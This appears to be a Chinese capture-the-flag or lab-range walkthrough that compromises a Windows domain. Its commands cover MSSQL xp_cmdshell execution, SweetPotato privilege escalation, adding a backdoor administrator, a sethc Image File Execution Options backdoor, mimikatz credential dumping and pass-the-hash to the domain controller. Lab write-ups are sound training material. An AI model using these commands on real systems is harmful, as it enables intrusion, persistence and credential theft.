flag01
fscan扫一下,找到mssql数据库的ip、端口、用户名以及密码
mssql:39.99.132.19:1433:sa 1qaz!QAZ
用MDUT工具连接(如果报错的话就重新安装一个)
激活组件xp_cmdshell
执行一下whoami命令,可以看到执行成功
MDUT的文件管理中上传SweetPotato.exe
提权,提升到管理员权限
SweetPotato.exe路径 -a whoami
获得flag01
SweetPotato.exe路径 -a "type C:\Users\Administrator\flag\flag01.txt"
或者用下面的命令添加用户test,远程登录
SweetPotato.exe路径 -a "net user test qwer1234! /add"
SweetPotato.exe路径 -a "net localgroup administrators test /add"
SweetPotato.exe路径 -a "REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f"
flag01: flag{dd5b46c4-850d-4605-8b68-e74ac29d7ed3}
flag02
查看网络情况
ipconfig
上传fscan64.exe扫一下内网
fscan64.exe路径 -h 172.22.8.18/24
内网情况如下
172.22.8.15 域控
172.22.8.31 域内机器
172.22.8.18 已拿下
172.22.8.46 域内机器
quser查看计算机上的用户会话信息(quser命令在windows server和windows的某些专业版才适用)
可以看到有一个john用户(或者用net user)
继续收集信息,查看网络连接情况
netstat -no
发现3389端口和另一个域内机器有连接,即172.22.8.31
用管理员权限运行cmd(一定要用管理员身份运行!),使用模拟令牌看看john账户(下载地址)
SharpToken.exe execute "WIN-WEB\John" cmd true
出现错误
在控制面板找到服务器管理器
服务器管理器-->管理-->添加角色1 和功能-->功能-->勾选.net3.5进行安装
执行net use,发现一个共享
里面有一个敏感文件,查看后获取一个凭证和一个提示(镜像劫持)
dir \\TSCLIENT\C
type \\TSCLIENT\C\credential.txt
xiaorang.lab\Aldrich:Ald@rLMWuy7Z!#
frpc复制粘贴进去,启动一下,再开启proxifier
使用rdesktop远程连接
proxychains rdesktop 172.22.8.31:3389
显示密码过期
修改密码之后还是登录不了
但是可以登录到172.22.8.46,再开一个mstsc远程连接
查看权限,当前用户是普通用户,没有管理员权限
net group "domain admins" /domain
net config workstation
下面利用之前提示的镜像劫持
先看看注册表权限(PowerShell命令)
get-acl -path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" | fl *
这里发现普通用户也可以对下面的注册表进行创建和写入
HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
那么可以通过以下命令设置shift后门
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
或者利用锁定界面的放大镜提权
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
锁定用户,连续按5下shift,弹出管理员终端
直接type就能获得flag
type "C:\Users\Administrator\flag\flag02.txt"
flag02:flag{6043b693-fb03-4234-83be-8c3830a78b62}
flag03
上传mimikatz,用shift后门启动管理员权限的cmd,运行mimikatz,执行命令
privilege::debug
log
sekurlsa::logonpasswords
用mimikatz 注入hash到lsass进程中
privilege::debug
sekurlsa::pth /user:WIN2016$ /domain:jugg /ntlm:72c36246f7bcf98cea1f42ecccf48b50
运行完会跳出一个命令框,直接通过命令行可以访问域控的文件
获取flag03
dir \\172.22.8.15\c$\users\administrator\flag
type \\172.22.8.15\c$\users\administrator\flag\flag03.txt
flag03:flag{0b6a2de9-a22c-4a8f-95cb-2917474fbbd0}
ps:flag是动态的